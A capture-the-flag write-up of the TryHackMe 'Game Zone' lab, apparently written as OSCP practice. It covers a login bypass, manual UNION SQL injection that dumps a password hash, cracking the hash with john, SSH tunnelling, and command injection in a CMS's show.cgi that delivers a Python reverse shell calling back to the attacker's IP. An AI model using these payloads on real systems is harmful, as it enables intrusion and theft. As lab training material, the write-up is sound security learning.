Table of contents
Game Zone is the fourth machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.
Enumeration
Nmap scan output:
nmap -sC -sV -o gamezone <ip>
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Only two ports are available: ssh and http.
Open the browser and check the content on port 80.
Exploitation
I used ' or 1=1# to bypass the login form.
After that, you will be redirected to the /portal.php page with a single search bar.
The official guide is recommending you use SQLMap here, but I’m doing this room to prepare myself for the upcoming OSCP.
SQLMap is banned on the OSCP, plus you can use the Metasploit only once. That’s why most of my writeups here are using mostly manual ways to exploit the target.
You can read about the manual way of SQLi here, but I’ll shrink it down to the key points applicable to this box.
We got some data back if we are trying the syntax of a basic UNION injection:
' UNION SELECT 1,2,3#
First, we need to know what’s inside the DB. We can check INFORMATION_SCHEMA for that:
' UNION SELECT 1,(select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA),3#
As an output, we got the list of schemas. information_schema,db,mysql,performance_schema,sys
We are interested in db in the first place.
Let’s check what tables can we find inside a db:
' UNION SELECT 1,(select group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'db'),3#
There are only two tables post and users. Users sound more like juicy stuff, let’s dig in a bit more and extract a column of it:
' UNION SELECT 1,(select group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'),3#
The output: username,pwd,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS Sweet, so there are username and pwd! Let’s extract them:
' UNION SELECT 1,(select username from db.users),3#
agent47
and
' UNION SELECT 1,(select pwd from db.users),3#
ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
We got credentials! Well, it’s still a hash, and we have to crack it.
JohnTheReaper can help with that.
/usr/sbin/john -w=/usr/share/wordlists/rockyou.txt ./john.hash --format=Raw-SHA256
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 128/128 AVX 4x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
*********** (agent47)
1g 0:00:00:00 DONE (2020-10-16 04:10) 2.325g/s 6782Kp/s 6782Kc/s 6782KC/s vimivi..veluca
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed
The password is redacted due to THM’s rule about writeups.
Now, when you have both username and password, you can connect to the machine via ssh.
PrivEsc
Privilege escalation is very tricky here.
First, you can check what is running on the machine. This part is nicely described in the official guide, so I will quickly go through it:
agent47@gamezone:~$ ss -tulpn
We can see that a service running on port 10000 is blocked via a firewall rule from the outside, so we can’t interact with it directly.
However, we can use ssh tunneling to forward this service to some ports in our Kali Linux machine:
ssh -L 10000:localhost:10000 agent47@<ip>
Now if you navigate to the localhost:10000 on your Kali Linux you will find something new there - the login page for admin section of this site.
Plus, you already have the credentials! wink
From here, we can find out the name and the version of the CMS.
The thing is, that if you check available exploits for this CMS, you will actually find a few, but both of them are Metasploit modules.
Again, my initial goal here is to avoid automated tools.
Frankly speaking, this one took me a while to figure out.
As you might guess, we will not ‘use’ the exploit itself, but I will use the vulnerability described there.
This is a snippet of the most interesting part of it:
res = send_request_cgi(
{
'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",
'cookie' => "sid=#{session}"
}, 25)
Long story short, we can specify the put a random text there, add the | symbol, and put our payload there with another | at the end.
If your goal is the flag, you can do something like
http://localhost:10000/file/show.cgi/show.cgi/bin/AAAA|cat%20/root/root.txt|
And get your flag.
But! Our goals here might be different, but I prefer to look at this as a penetration test, and not a CTF even.
SHELL > flag
Let’s spawn a shell, then!
You have access to the system, so you can save some time with commands like which python, which perl, etc. You can also check if the flavor of the nc supports -e flag or not.
To get the shell, I used a command from PentestMonkey for python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
as you will throw it into the browser, don’t forget to URL-encode all the things:
python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.11.19.53%22%2C1337%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27
Open up a listener for your port, you can use something fancy as 1337 if you want to trigger your root shell:
localhost:10000/file/show.cgi/show.cgi/bin/AAAA|python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.11.19.53%22%2C1337%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3B%20os.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27|
Voilà! There you go.
Takeaway
I hate
SQLitoo, but you have to learn it to not always blindly rely on your toolsMetasploitis fine, it is well-tested, it is rich, etc. But make sure that you can read and understand the code behind the exploit that you are using.SHELLS > FLAGS! PERIOD!